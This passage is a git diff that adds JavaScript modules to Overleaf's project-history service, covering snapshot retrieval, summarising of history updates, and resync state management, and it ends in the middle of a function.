+ if (isTrackedDeletion) { + trackedDeletionOffset += trackedChange.range.length + } + } + + // Comments are shifted left by the length of any previous tracked deletions. + // If they overlap with a tracked deletion, they are truncated. + // + // Example: + // { } comment + // [ ] tracked deletion + // the quic[k {b]rown [fox] jum[ps} ove]r the lazy dog + // => rown jum + // starting at position 8 + const trackedDeletions = trackedChanges.filter( + tc => tc.tracking.type === 'delete' + ) + const docUpdaterCompatibleComments = [] + for (const comment of comments) { + let trackedDeletionIndex = 0 + if (comment.ranges.length === 0) { + // Translate detached comments into zero length comments at position 0 + docUpdaterCompatibleComments.push({ + op: { + p: 0, + c: '', + t: comment.id, + resolved: comment.resolved, + }, + }) + continue + } + + // Consider a multiple range comment as a single comment that joins all its + // ranges + const commentStart = comment.ranges[0].start + const commentEnd = comment.ranges[comment.ranges.length - 1].end + + let commentContent = '' + // Docupdater position + let position = commentStart + while (trackedDeletions[trackedDeletionIndex]?.range.end <= commentStart) { + // Skip over tracked deletions that are before the current comment range + position -= trackedDeletions[trackedDeletionIndex].range.length + trackedDeletionIndex++ + } + + if (trackedDeletions[trackedDeletionIndex]?.range.start < commentStart) { + // There's overlap with a tracked deletion, move the position left and + // truncate the overlap + position -= + commentStart - trackedDeletions[trackedDeletionIndex].range.start + } + + // Cursor in the history content + let cursor = commentStart + while (cursor < commentEnd) { + const trackedDeletion = trackedDeletions[trackedDeletionIndex] + if (!trackedDeletion || trackedDeletion.range.start >= commentEnd) { + // We've run out of relevant tracked changes + commentContent += content.slice(cursor, commentEnd) + break + } + if (trackedDeletion.range.start > cursor) { + // There's a gap between the current cursor and the tracked deletion + commentContent += content.slice(cursor, trackedDeletion.range.start) + } + + if (trackedDeletion.range.end <= commentEnd) { + // Skip to the end of the tracked delete + cursor = trackedDeletion.range.end + trackedDeletionIndex++ + } else { + // We're done with that comment + break + } + } + docUpdaterCompatibleComments.push({ + op: { + p: position, + c: commentContent, + t: comment.id, + resolved: comment.resolved, + }, + id: comment.id, + }) + } + + return { + changes: docUpdaterCompatibleTrackedChanges, + comments: docUpdaterCompatibleComments, + } +} + +/** + * Gets the file metadata at a specific version. + * + * @param {string} projectId + * @param {number} version + * @param {string} pathname + * @returns {Promise<{metadata: any}>} + */ +async function getFileMetadataSnapshot(projectId, version, pathname) { + const snapshot = await _getSnapshotAtVersion(projectId, version) + const file = snapshot.getFile(pathname) + if (!file) { + throw new Errors.NotFoundError(`${pathname} not found`, { + projectId, + version, + pathname, + }) + } + const rawMetadata = file.getMetadata() + const metadata = _.isEmpty(rawMetadata) ? undefined : rawMetadata + + return { metadata } +} + +// Returns project snapshot containing the document content for files with +// text operations in the relevant chunk, and hashes for unmodified/binary +// files. Used by git bridge to get the state of the project. +async function getProjectSnapshot(projectId, version) { + const snapshot = await _getSnapshotAtVersion(projectId, version) + const historyId = await WebApiManager.promises.getHistoryId(projectId) + await _loadFilesLimit( + snapshot, + 'eager', + HistoryStoreManager.getBlobStore(historyId) + ) + return { + projectId, + files: snapshot.getFileMap().map(file => { + if (!file) { + return null + } + const content = file.getContent({ + filterTrackedDeletes: true, + }) + if (content === null) { + return { data: { hash: file.getHash() } } + } + return { data: { content } } + }), + } +} + +async function getPathsAtVersion(projectId, version) { + const snapshot = await _getSnapshotAtVersion(projectId, version) + return { + paths: snapshot.getFilePathnames(), + } +} + +/** + * + * @param {string} projectId + * @param {number} version + */ +async function _getSnapshotAtVersion(projectId, version) { + const historyId = await WebApiManager.promises.getHistoryId(projectId) + const data = await HistoryStoreManager.promises.getChunkAtVersion( + projectId, + historyId, + version + ) + const chunk = Core.Chunk.fromRaw(data.chunk) + const snapshot = chunk.getSnapshot() + const changes = chunk.getChanges().slice(0, version - chunk.getStartVersion()) + snapshot.applyAll(changes) + return snapshot +} + +/** + * @param {string} projectId + * @param {string} historyId + * @return {Promise<Record<string, import('overleaf-editor-core').File>>} + */ +async function getLatestSnapshotFiles(projectId, historyId) { + const data = await HistoryStoreManager.promises.getMostRecentChunk( + projectId, + historyId + ) + return await getLatestSnapshotFilesForChunk(historyId, data) +} + +/** + * @param {string} historyId + * @param {{chunk: import('overleaf-editor-core/lib/types.js').RawChunk}} chunk + * @return {Promise<Record<string, import('overleaf-editor-core').File>>} + */ +async function getLatestSnapshotFilesForChunk(historyId, chunk) { + const { snapshot } = getLatestSnapshotFromChunk(chunk) + const snapshotFiles = await snapshot.loadFiles( + 'lazy', + HistoryStoreManager.getBlobStore(historyId) + ) + return snapshotFiles +} + +/** + * @param {string} projectId + * @param {string} historyId + * @return {Promise<{version: number, snapshot: import('overleaf-editor-core').Snapshot}>} + */ +async function getLatestSnapshot(projectId, historyId) { + const data = await HistoryStoreManager.promises.getMostRecentChunk( + projectId, + historyId + ) + return getLatestSnapshotFromChunk(data) +} + +/** + * @param {{chunk: import('overleaf-editor-core/lib/types.js').RawChunk}} data + * @return {{version: number, snapshot: import('overleaf-editor-core').Snapshot}} + */ +function getLatestSnapshotFromChunk(data) { + if (data == null || data.chunk == null) { + throw new OError('undefined chunk') + } + + // apply all the changes in the chunk to get the current snapshot + const chunk = Core.Chunk.fromRaw(data.chunk) + const snapshot = chunk.getSnapshot() + const changes = chunk.getChanges() + snapshot.applyAll(changes) + return { + snapshot, + version: chunk.getEndVersion(), + } +} + +async function getChangesInChunkSince(projectId, historyId, sinceVersion) { + const latestChunk = Core.Chunk.fromRaw( + ( + await HistoryStoreManager.promises.getMostRecentChunk( + projectId, + historyId + ) + ).chunk + ) + if (sinceVersion > latestChunk.getEndVersion()) { + throw new Errors.BadRequestError( + 'requested version past the end of the history' + ) + } + const latestStartVersion = latestChunk.getStartVersion() + let chunk = latestChunk + if (sinceVersion < latestStartVersion) { + chunk = Core.Chunk.fromRaw( + ( + await HistoryStoreManager.promises.getChunkAtVersion( + projectId, + historyId, + sinceVersion + ) + ).chunk + ) + } + const changes = chunk + .getChanges() + .slice(sinceVersion - chunk.getStartVersion()) + return { latestStartVersion, changes } +} + +async function _loadFilesLimit(snapshot, kind, blobStore) { + await snapshot.fileMap.mapAsync(async file => { + // only load changed files or files with tracked changes, others can be + // dereferenced from their blobs (this method is only used by the git + // bridge which understands how to load blobs). + if (!file.isEditable() || (file.getHash() && !file.getRangesHash())) { + return + } + await file.load(kind, blobStore) + }, MAX_REQUESTS) +} + +// EXPORTS + +const getChangesInChunkSinceCb = callbackify(getChangesInChunkSince) +const getFileSnapshotStreamCb = callbackify(getFileSnapshotStream) +const getProjectSnapshotCb = callbackify(getProjectSnapshot) +const getLatestSnapshotCb = callbackify(getLatestSnapshot) +const getLatestSnapshotFilesCb = callbackify(getLatestSnapshotFiles) +const getLatestSnapshotFilesForChunkCb = callbackify( + getLatestSnapshotFilesForChunk +) +const getRangesSnapshotCb = callbackify(getRangesSnapshot) +const getFileMetadataSnapshotCb = callbackify(getFileMetadataSnapshot) +const getPathsAtVersionCb = callbackify(getPathsAtVersion) + +export { + getLatestSnapshotFromChunk, + getChangesInChunkSinceCb as getChangesInChunkSince, + getFileSnapshotStreamCb as getFileSnapshotStream, + getProjectSnapshotCb as getProjectSnapshot, + getFileMetadataSnapshotCb as getFileMetadataSnapshot, + getLatestSnapshotCb as getLatestSnapshot, + getLatestSnapshotFilesCb as getLatestSnapshotFiles, + getLatestSnapshotFilesForChunkCb as getLatestSnapshotFilesForChunk, + getRangesSnapshotCb as getRangesSnapshot, + getPathsAtVersionCb as getPathsAtVersion, +} + +export const promises = { + getChangesInChunkSince, + getFileSnapshotStream, + getProjectSnapshot, + getLatestSnapshot, + getLatestSnapshotFiles, + getLatestSnapshotFilesForChunk, + getRangesSnapshot, + getPathsAtVersion, + getFileMetadataSnapshot, +} diff --git a/services/project-history/app/js/SummarizedUpdatesManager.js b/services/project-history/app/js/SummarizedUpdatesManager.js new file mode 100644 index 0000000..a96c16e --- /dev/null +++ b/services/project-history/app/js/SummarizedUpdatesManager.js @@ -0,0 +1,354 @@ +import _ from 'lodash' +import async from 'async' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import * as ChunkTranslator from './ChunkTranslator.js' +import * as HistoryApiManager from './HistoryApiManager.js' +import * as HistoryStoreManager from './HistoryStoreManager.js' +import * as LabelsManager from './LabelsManager.js' +import * as UpdatesProcessor from './UpdatesProcessor.js' +import * as WebApiManager from './WebApiManager.js' + +const MAX_CHUNK_REQUESTS = 5 +const TIME_BETWEEN_DISTINCT_UPDATES = 5 * 60 * 1000 // five minutes + +export function getSummarizedProjectUpdates(projectId, options, callback) { + // Some notes on versions: + // + // Versions of the project are like the fenceposts between updates. + // An update applies to a certain version of the project, and gives us the + // next version. + // + // When we ask for updates 'before' a version, this includes the update + // that created the version equal to 'before'. + // + // A chunk in OL has a 'startVersion', which is the version of the project + // before any of the updates in it were applied. This is the same version as + // the last update in the previous chunk would have created. + // + // If we ask the OL history store for the chunk with version that is the end of one + // chunk and the start of another, it will return the older chunk, i.e. + // the chunk with the updates that led up to that version. + // + // So once we read in the updates from a chunk, and want to get the updates from + // the previous chunk, we ask OL for the chunk with the version equal to the + // 'startVersion' of the newer chunk we just read. + + let nextVersionToRequest + if (options == null) { + options = {} + } + if (!options.min_count) { + options.min_count = 25 + } + if (options.before != null) { + // The version is of the doc, so we want the updates before that version, + // which includes the update that created that version. + nextVersionToRequest = options.before + } else { + // Return the latest updates first if no nextVersionToRequest is set. + nextVersionToRequest = null + } + + UpdatesProcessor.processUpdatesForProject(projectId, function (error) { + if (error) { + return callback(OError.tag(error)) + } + LabelsManager.getLabels(projectId, function (error, labels) { + if (error) { + return callback(OError.tag(error)) + } + + const labelsByVersion = {} + for (const label of labels) { + if (labelsByVersion[label.version] == null) { + labelsByVersion[label.version] = [] + } + labelsByVersion[label.version].push(label) + } + + WebApiManager.getHistoryId(projectId, function (error, historyId) { + if (error) return callback(error) + let chunksRequested = 0 + let summarizedUpdates = [] + let toV = null + + const shouldRequestMoreUpdates = cb => { + return cb( + null, + chunksRequested < MAX_CHUNK_REQUESTS && + (nextVersionToRequest == null || nextVersionToRequest > 0) && + summarizedUpdates.length < options.min_count + ) + } + + const getNextBatchOfUpdates = cb => + _getProjectUpdates( + projectId, + historyId, + nextVersionToRequest, + function (error, updateSet, startVersion) { + if (error) { + return cb(OError.tag(error)) + } + // Updates are returned in time order, but we want to go back in time + updateSet.reverse() + updateSet = discardUnwantedUpdates(updateSet) + ;({ summarizedUpdates, toV } = _summarizeUpdates( + updateSet, + labelsByVersion, + summarizedUpdates, + toV + )) + nextVersionToRequest = startVersion + chunksRequested += 1 + cb() + } + ) + + function discardUnwantedUpdates(updateSet) { + // We're getting whole chunks from the OL history store, but we might + // only want updates from before a certain version + if (options.before == null) { + return updateSet + } else { + return updateSet.filter(u => u.v < options.before) + } + } + + // If the project doesn't have a history then we can bail out here + HistoryApiManager.shouldUseProjectHistory( + projectId, + function (error, shouldUseProjectHistory) { + if (error) { + return callback(OError.tag(error)) + } + if (shouldUseProjectHistory) { + async.whilst( + shouldRequestMoreUpdates, + getNextBatchOfUpdates, + function (error) { + if (error) { + return callback(OError.tag(error)) + } + callback( + null, + summarizedUpdates, + nextVersionToRequest > 0 ? nextVersionToRequest : undefined + ) + } + ) + } else { + logger.debug( + { projectId }, + 'returning no updates as project does not use history' + ) + callback(null, []) + } + } + ) + }) + }) + }) +} + +function _getProjectUpdates(projectId, historyId, version, callback) { + function getChunk(cb) { + if (version != null) { + HistoryStoreManager.getChunkAtVersion(projectId, historyId, version, cb) + } else { + HistoryStoreManager.getMostRecentChunk(projectId, historyId, cb) + } + } + + getChunk(function (error, chunk) { + if (error) { + return callback(OError.tag(error)) + } + const oldestVersion = chunk.chunk.startVersion + ChunkTranslator.convertToSummarizedUpdates( + chunk, + function (error, updateSet) { + if (error) { + return callback(OError.tag(error)) + } + callback(error, updateSet, oldestVersion) + } + ) + }) +} + +function _summarizeUpdates(updates, labels, existingSummarizedUpdates, toV) { + if (existingSummarizedUpdates == null) { + existingSummarizedUpdates = [] + } + const summarizedUpdates = existingSummarizedUpdates.slice() + for (const update of updates) { + if (toV == null) { + // This is the first update we've seen. Initialize toV. + toV = update.v + 1 + } + + // Skip empty updates (only record their version). Empty updates are + // updates that only contain comment operations. We don't have a UI for + // these yet. + if (isUpdateEmpty(update)) { + continue + } + + // The client needs to know the exact version that a delete happened, in order + // to be able to restore. So even when summarizing, retain the version that each + // projectOp happened at. + for (const projectOp of update.project_ops) { + projectOp.atV = update.v + } + + const summarizedUpdate = summarizedUpdates[summarizedUpdates.length - 1] + const labelsForVersion = labels[update.v + 1] || [] + if ( + summarizedUpdate && + _shouldMergeUpdate(update, summarizedUpdate, labelsForVersion) + ) { + _mergeUpdate(update, summarizedUpdate) + } else { + const newUpdate = { + fromV: update.v, + toV, + meta: { + users: update.meta.users, + start_ts: update.meta.start_ts, + end_ts: update.meta.end_ts, + }, + labels: labelsForVersion, + pathnames: new Set(update.pathnames), + project_ops: update.project_ops.slice(), // Clone since we'll modify + } + if (update.meta.origin) { + newUpdate.meta.origin = update.meta.origin + } + + summarizedUpdates.push(newUpdate) + } + toV = update.v + } + + return { summarizedUpdates, toV } +} + +/** + * Given an update, the latest summarized update, and the labels that apply to + * the update, figure out if we can merge the update into the summarized + * update. + */ +function _shouldMergeUpdate(update, summarizedUpdate, labels) { + // Split updates on labels + if (labels.length > 0) { + return false + } + + // Split updates on origin + if (update.meta.origin) { + if (summarizedUpdate.meta.origin) { + if (update.meta.origin.kind !== summarizedUpdate.meta.origin.kind) { + return false + } + if (update.meta.origin.path !== summarizedUpdate.meta.origin.path) { + return false + } + if ( + update.meta.origin.kind === 'file-restore' && + update.meta.origin.timestamp !== summarizedUpdate.meta.origin.timestamp + ) { + return false + } + if ( + update.meta.origin.kind === 'project-restore' && + update.meta.origin.timestamp !== summarizedUpdate.meta.origin.timestamp + ) { + return false + } + } else { + return false + } + } else if (summarizedUpdate.meta.origin) { + return false + } + + // Split updates if it's been too long since the last update. We're going + // backwards in time through the updates, so the update comes before the summarized update. + if ( + summarizedUpdate.meta.end_ts - update.meta.start_ts >= + TIME_BETWEEN_DISTINCT_UPDATES + ) { + return false + } + + // Do not merge text operations and file operations, except for history resyncs + const updateHasTextOps = update.pathnames.length > 0 + const updateHasFileOps = update.project_ops.length > 0 + const summarizedUpdateHasTextOps = summarizedUpdate.pathnames.size > 0 + const summarizedUpdateHasFileOps = summarizedUpdate.project_ops.length > 0 + const isHistoryResync = + update.meta.origin && + ['history-resync', 'history-migration'].includes(update.meta.origin.kind) + if ( + !isHistoryResync && + ((updateHasTextOps && summarizedUpdateHasFileOps) || + (updateHasFileOps && summarizedUpdateHasTextOps)) + ) { + return false + } + + return true +} + +/** + * Merge an update into a summarized update. + * + * This mutates the summarized update. + */ +function _mergeUpdate(update, summarizedUpdate) { + // check if the user in this update is already present in the earliest update, + // if not, add them to the users list of the earliest update + summarizedUpdate.meta.users = _.uniqBy( + _.union(summarizedUpdate.meta.users, update.meta.users), + function (user) { + if (user == null) { + return null + } + if (user.id == null) { + return user + } + return user.id + } + ) + + summarizedUpdate.fromV = Math.min(summarizedUpdate.fromV, update.v) + summarizedUpdate.toV = Math.max(summarizedUpdate.toV, update.v + 1) + summarizedUpdate.meta.start_ts = Math.min( + summarizedUpdate.meta.start_ts, + update.meta.start_ts + ) + summarizedUpdate.meta.end_ts = Math.max( + summarizedUpdate.meta.end_ts, + update.meta.end_ts + ) + + // Add file operations + for (const op of update.project_ops || []) { + summarizedUpdate.project_ops.push(op) + if (op.add) { + // Merging a file creation. Remove any corresponding edit since that's redundant. + summarizedUpdate.pathnames.delete(op.add.pathname) + } + } + + // Add edit operations + for (const pathname of update.pathnames || []) { + summarizedUpdate.pathnames.add(pathname) + } +} + +function isUpdateEmpty(update) { + return update.project_ops.length === 0 && update.pathnames.length === 0 +} diff --git a/services/project-history/app/js/SyncManager.js b/services/project-history/app/js/SyncManager.js new file mode 100644 index 0000000..ef8caf6 --- /dev/null +++ b/services/project-history/app/js/SyncManager.js @@ -0,0 +1,1219 @@ +// @ts-check + +import _ from 'lodash' +import { callbackify, promisify } from 'node:util' +import { callbackifyMultiResult } from '@overleaf/promise-utils' +import Settings from '@overleaf/settings' +import logger from '@overleaf/logger' +import Metrics from '@overleaf/metrics' +import OError from '@overleaf/o-error' +import { File, Range } from 'overleaf-editor-core' +import { NeedFullProjectStructureResyncError, SyncError } from './Errors.js' +import { db, ObjectId } from './mongodb.js' +import * as SnapshotManager from './SnapshotManager.js' +import * as LockManager from './LockManager.js' +import * as UpdateTranslator from './UpdateTranslator.js' +import * as UpdateCompressor from './UpdateCompressor.js' +import * as WebApiManager from './WebApiManager.js' +import * as ErrorRecorder from './ErrorRecorder.js' +import * as RedisManager from './RedisManager.js' +import * as HistoryStoreManager from './HistoryStoreManager.js' +import * as HashManager from './HashManager.js' +import { isInsert, isDelete } from './Utils.js' + +/** + * @import { Comment as HistoryComment, TrackedChange as HistoryTrackedChange } from 'overleaf-editor-core' + * @import { Comment, Entity, ResyncDocContentUpdate, RetainOp, TrackedChange } from './types' + * @import { TrackedChangeTransition, TrackingDirective, TrackingType, Update } from './types' + * @import { ProjectStructureUpdate } from './types' + */ +const MAX_RESYNC_HISTORY_RECORDS = 100 // keep this many records of previous resyncs +const EXPIRE_RESYNC_HISTORY_INTERVAL_MS = 90 * 24 * 3600 * 1000 // 90 days + +const keys = Settings.redis.lock.key_schema + +// db.projectHistorySyncState.ensureIndex({expiresAt: 1}, {expireAfterSeconds: 0, background: true}) +// To add expiresAt field to existing entries in collection (choose a suitable future expiry date): +// db.projectHistorySyncState.updateMany({resyncProjectStructure: false, resyncDocContents: [], expiresAt: {$exists:false}}, {$set: {expiresAt: new Date("2019-07-01")}}) + +async function startResync(projectId, options = {}) { + // We have three options here + // + // 1. If we update mongo before making the call to web then there's a + // chance we ignore all updates indefinitely (there's no foolproff way + // to undo the change in mongo) + // + // 2. If we make the call to web first then there is a small race condition + // where we could process the sync update and then only update mongo + // after, causing all updates to be ignored from then on + // + // 3. We can wrap everything in a project lock + Metrics.inc('project_history_resync') + try { + await LockManager.promises.runWithLock( + keys.projectHistoryLock({ project_id: projectId }), + async extendLock => { + await startResyncWithoutLock(projectId, options) + } + ) + } catch (error) { + // record error in starting sync ("sync ongoing") + if (error instanceof Error) { + await ErrorRecorder.promises.record(projectId, -1, error) + } + throw error + } +} + +async function startHardResync(projectId, options = {}) { + Metrics.inc('project_history_hard_resync') + try { + await LockManager.promises.runWithLock( + keys.projectHistoryLock({ project_id: projectId }), + async extendLock => { + await clearResyncState(projectId) + await RedisManager.promises.clearFirstOpTimestamp(projectId) + await RedisManager.promises.destroyDocUpdatesQueue(projectId) + await startResyncWithoutLock(projectId, options) + } + ) + } catch (error) { + // record error in starting sync ("sync ongoing") + if (error instanceof Error) { + await ErrorRecorder.promises.record(projectId, -1, error) + } + throw error + } +} + +// The caller must hold the lock and should record any errors via the ErrorRecorder. +async function startResyncWithoutLock(projectId, options) { + await ErrorRecorder.promises.recordSyncStart(projectId) + + const syncState = await _getResyncState(projectId) + if (syncState.isSyncOngoing()) { + throw new OError('sync ongoing') + } + syncState.setOrigin(options.origin || { kind: 'history-resync' }) + syncState.startProjectStructureSync() + + const webOpts = {} + if (options.historyRangesMigration) { + webOpts.historyRangesMigration = options.historyRangesMigration + } + if (options.resyncProjectStructureOnly) { + webOpts.resyncProjectStructureOnly = options.resyncProjectStructureOnly + } + await WebApiManager.promises.requestResync(projectId, webOpts) + await setResyncState(projectId, syncState) +} + +async function _getResyncState(projectId) { + const rawSyncState = await db.projectHistorySyncState.findOne({ + project_id: new ObjectId(projectId.toString()), + }) + const syncState = SyncState.fromRaw(projectId, rawSyncState) + return syncState +} + +async function setResyncState(projectId, syncState) { + // skip if syncState is null (i.e. unchanged) + if (syncState == null) { + return + } + const update = { + $set: syncState.toRaw(), + $push: { + history: { + $each: [{ syncState: syncState.toRaw(), timestamp: new Date() }], + $position: 0, + $slice: MAX_RESYNC_HISTORY_RECORDS, + }, + }, + $currentDate: { lastUpdated: true }, + } + + // handle different cases + if (syncState.isSyncOngoing()) { + // starting a new sync; prevent the entry expiring while sync is in ongoing + update.$inc = { resyncCount: 1 } + update.$unset = { expiresAt: true } + } else { + // successful completion of existing sync; set the entry to expire in the + // future + update.$set.expiresAt = new Date( + Date.now() + EXPIRE_RESYNC_HISTORY_INTERVAL_MS + ) + } + + // apply the update + await db.projectHistorySyncState.updateOne( + { project_id: new ObjectId(projectId) }, + update, + { upsert: true } + ) +} + +async function clearResyncState(projectId) { + await db.projectHistorySyncState.deleteOne({ + project_id: new ObjectId(projectId.toString()), + }) +} + +/** + * @param {string} projectId + * @param {Date} date + * @return {Promise<void>} + */ +async function clearResyncStateIfAllAfter(projectId, date) { + const rawSyncState = await db.projectHistorySyncState.findOne({ + project_id: new ObjectId(projectId.toString()), + }) + if (!rawSyncState) return // already cleared + const state = SyncState.fromRaw(projectId, rawSyncState) + if (state.isSyncOngoing()) return // new sync started + for (const { timestamp } of rawSyncState.history) { + if (timestamp < date) return // preserve old resync states + } + // expiresAt is cleared when starting a sync and bumped when making changes. + // Use expiresAt as read to ensure we only clear the confirmed state. + await db.projectHistorySyncState.deleteOne({ + project_id: new ObjectId(projectId.toString()), + expiresAt: rawSyncState.expiresAt, + }) +} + +async function skipUpdatesDuringSync(projectId, updates) { + const syncState = await _getResyncState(projectId) + if (!syncState.isSyncOngoing()) { + logger.debug({ projectId }, 'not skipping updates: no resync in progress') + // don't return syncState when unchanged + return { updates, syncState: null } + } + + const filteredUpdates = [] + + for (const update of updates) { + syncState.updateState(update) + const shouldSkipUpdate = syncState.shouldSkipUpdate(update) + if (!shouldSkipUpdate) { + filteredUpdates.push(update) + } else { + logger.debug({ projectId, update }, 'skipping update due to resync') + } + } + return { updates: filteredUpdates, syncState } +} + +/** + * @param {string} projectId + * @param {string} projectHistoryId + * @param {{chunk: import('overleaf-editor-core/lib/types.js').RawChunk}} mostRecentChunk + * @param {Array<Update>} updates + * @param {() => Promise<void>} extendLock + * @return {Promise<Array<Update>>} + */ +async function expandSyncUpdates( + projectId, + projectHistoryId, + mostRecentChunk, + updates, + extendLock +) { + const areSyncUpdatesQueued = + _.some(updates, 'resyncProjectStructure') || + _.some(updates, 'resyncDocContent') + if (!areSyncUpdatesQueued) { + logger.debug({ projectId }, 'no resync updates to expand') + return updates + } + + const syncState = await _getResyncState(projectId) + + // compute the current snapshot from the most recent chunk + const snapshotFiles = + await SnapshotManager.promises.getLatestSnapshotFilesForChunk( + projectHistoryId, + mostRecentChunk + ) + + // check if snapshot files are valid + const invalidFiles = _.pickBy( + snapshotFiles, + (v, k) => v == null || typeof v.isEditable !== 'function' + ) + if (_.size(invalidFiles) > 0) { + throw new SyncError('file is missing isEditable method', { + projectId, + invalidFiles, + }) + } + + const expander = new SyncUpdateExpander( + projectId, + snapshotFiles, + syncState.origin + ) + + // expand updates asynchronously to avoid blocking + for (const update of updates) { + await expander.expandUpdate(update) + await extendLock() + } + + return expander.getExpandedUpdates() +} + +class SyncState { + constructor(projectId, resyncProjectStructure, resyncDocContents, origin) { + this.projectId = projectId + this.resyncProjectStructure = resyncProjectStructure + this.resyncDocContents = resyncDocContents + this.origin = origin + } + + static fromRaw(projectId, rawSyncState) { + rawSyncState = rawSyncState || {} + const resyncProjectStructure = rawSyncState.resyncProjectStructure || false + const resyncDocContents = new Set(rawSyncState.resyncDocContents || []) + const origin = rawSyncState.origin + return new SyncState( + projectId, + resyncProjectStructure, + resyncDocContents, + origin + ) + } + + toRaw() { + return { + resyncProjectStructure: this.resyncProjectStructure, + resyncDocContents: Array.from(this.resyncDocContents), + origin: this.origin, + } + } + + updateState(update) { + if (update.resyncProjectStructure != null) { + if (!this.isProjectStructureSyncing()) { + throw new SyncError('unexpected resyncProjectStructure update', { + projectId: this.projectId, + resyncProjectStructure: this.resyncProjectStructure, + }) + } + if (this.isAnyDocContentSyncing()) { + throw new SyncError('unexpected resyncDocContents update', { + projectId: this.projectId, + resyncDocContents: this.resyncDocContents, + }) + } + + if (!update.resyncProjectStructureOnly) { + for (const doc of update.resyncProjectStructure.docs) { + this.startDocContentSync(doc.path) + } + } + + this.stopProjectStructureSync() + } else if (update.resyncDocContent != null) { + if (this.isProjectStructureSyncing()) { + throw new SyncError('unexpected resyncDocContent update', { + projectId: this.projectId, + resyncProjectStructure: this.resyncProjectStructure, + }) + } + + if (!this.isDocContentSyncing(update.path)) { + throw new SyncError('unexpected resyncDocContent update', { + projectId: this.projectId, + resyncDocContents: this.resyncDocContents, + path: update.path, + }) + } + + this.stopDocContentSync(update.path) + } + } + + setOrigin(origin) { + this.origin = origin + } + + shouldSkipUpdate(update) { + // don't skip sync updates + if ( + update.resyncProjectStructure != null || + update.resyncDocContent != null + ) { + return false + } + + // if syncing project structure skip update + if (this.isProjectStructureSyncing()) { + return true + } + + // skip text updates for a docs being synced + if (UpdateTranslator.isTextUpdate(update)) { + if (this.isDocContentSyncing(update.meta.pathname)) { + return true + } + } + + // preserve all other updates + return false + } + + startProjectStructureSync() { + this.resyncProjectStructure = true + this.resyncDocContents = new Set([]) + } + + stopProjectStructureSync() { + this.resyncProjectStructure = false + } + + stopDocContentSync(pathname) { + this.resyncDocContents.delete(pathname) + } + + startDocContentSync(pathname) { + this.resyncDocContents.add(pathname) + } + + isProjectStructureSyncing() { + return this.resyncProjectStructure + } + + isDocContentSyncing(pathname) { + return this.resyncDocContents.has(pathname) + } + + isAnyDocContentSyncing() { + return this.resyncDocContents.size > 0 + } + + isSyncOngoing() { + return this.isProjectStructureSyncing() || this.isAnyDocContentSyncing() + } +} + +class SyncUpdateExpander { + /** + * Build a SyncUpdateExpander + * + * @param {string} projectId + * @param {Record<string, File>} snapshotFiles + * @param {string} origin + */ + constructor(projectId, snapshotFiles, origin) { + this.projectId = projectId + this.files = snapshotFiles + this.expandedUpdates = /** @type ProjectStructureUpdate[] */ [] + this.origin = origin + } + + // If there's an expected *file* with the same path and either the same hash + // or no hash, treat this as not editable even if history thinks it is. + isEditable(filePath, file, expectedFiles) { + if (!file.isEditable()) { + return false + } + const fileHash = _.get(file, ['data', 'hash']) + const matchedExpectedFile = expectedFiles.some(item => { + const expectedFileHash = item._hash + if (expectedFileHash && fileHash !== expectedFileHash) { + // expected file has a hash and it doesn't match + return false + } + return UpdateTranslator._convertPathname(item.path) === filePath + }) + + // consider editable file in history as binary, since it matches a binary file in the project + return !matchedExpectedFile + } + + /** + * @param {Update} update + */ + async expandUpdate(update) { + if ('resyncProjectStructure' in update) { + logger.debug( + { projectId: this.projectId, update }, + 'expanding resyncProjectStructure update' + ) + const persistedNonBinaryFileEntries = _.pickBy(this.files, (v, k) => + this.isEditable(k, v, update.resyncProjectStructure.files) + ) + const persistedNonBinaryFiles = _.map( + Object.keys(persistedNonBinaryFileEntries), + path => ({ + path, + }) + ) + + const persistedBinaryFileEntries = _.omitBy(this.files, (v, k) => + this.isEditable(k, v, update.resyncProjectStructure.files) + ) + // preserve file properties on binary files, for future comparison. + const persistedBinaryFiles = _.map( + persistedBinaryFileEntries, + (entity, key) => Object.assign({}, entity, { path: key }) + ) + const expectedNonBinaryFiles = _.map( + update.resyncProjectStructure.docs, + entity => + Object.assign({}, entity, { + path: UpdateTranslator._convertPathname(entity.path), + }) + ) + const expectedBinaryFiles = _.map( + update.resyncProjectStructure.files, + entity => + Object.assign({}, entity, { + path: UpdateTranslator._convertPathname(entity.path), + }) + ) + + // We need to detect and fix consistency issues where web and + // history-store disagree on whether an entity is binary or not. Thus we + // need to remove and add the two separately. + this.queueRemoveOpsForUnexpectedFiles( + update, + expectedBinaryFiles, + persistedBinaryFiles + ) + this.queueRemoveOpsForUnexpectedFiles( + update, + expectedNonBinaryFiles, + persistedNonBinaryFiles + ) + this.queueAddOpsForMissingFiles( + update, + expectedBinaryFiles, + persistedBinaryFiles + ) + this.queueAddOpsForMissingFiles( + update, + expectedNonBinaryFiles, + persistedNonBinaryFiles + ) + this.queueUpdateForOutOfSyncBinaryFiles( + update, + expectedBinaryFiles, + persistedBinaryFiles + ) + this.queueSetMetadataOpsForLinkedFiles(update) + + if (update.resyncProjectStructureOnly) { + const docPaths = new Set() + for (const entity of update.resyncProjectStructure.docs) { + const path = UpdateTranslator._convertPathname(entity.path) + docPaths.add(path) + } + for (const expandedUpdate of this.expandedUpdates) { + if (docPaths.has(expandedUpdate.pathname)) { + // Clear the resync state and queue entry, we need to start over. + this.expandedUpdates = [] + await clearResyncState(this.projectId) + await RedisManager.promises.deleteAppliedDocUpdate( + this.projectId, + update + ) + throw new NeedFullProjectStructureResyncError( + 'aborting partial resync: touched doc' + ) + } + } + } + } else if ('resyncDocContent' in update) { + logger.debug( + { projectId: this.projectId, update }, + 'expanding resyncDocContent update' + ) + await this.expandResyncDocContentUpdate(update) + } else { + this.expandedUpdates.push(update) + } + } + + getExpandedUpdates() { + return this.expandedUpdates + } + + /** + * @param {Entity[]} expectedFiles + * @param {{ path: string }[]} persistedFiles + */ + queueRemoveOpsForUnexpectedFiles(update, expectedFiles, persistedFiles) { + const unexpectedFiles = _.differenceBy( + persistedFiles, + expectedFiles, + 'path' + ) + for (const entity of unexpectedFiles) { + update = { + pathname: entity.path, + new_pathname: '', + meta: { + resync: true, + origin: this.origin, + ts: update.meta.ts, + }, + } + this.expandedUpdates.push(update) + Metrics.inc('project_history_resync_operation', 1, { + status: 'remove unexpected file', + }) + } + } + + /** + * @param {Entity[]} expectedFiles + * @param {{ path: string }[]} persistedFiles + */ + queueAddOpsForMissingFiles(update, expectedFiles, persistedFiles) { + const missingFiles = _.differenceBy(expectedFiles, persistedFiles, 'path') + for (const entity of missingFiles) { + update = { + pathname: entity.path, + meta: { + resync: true, + origin: 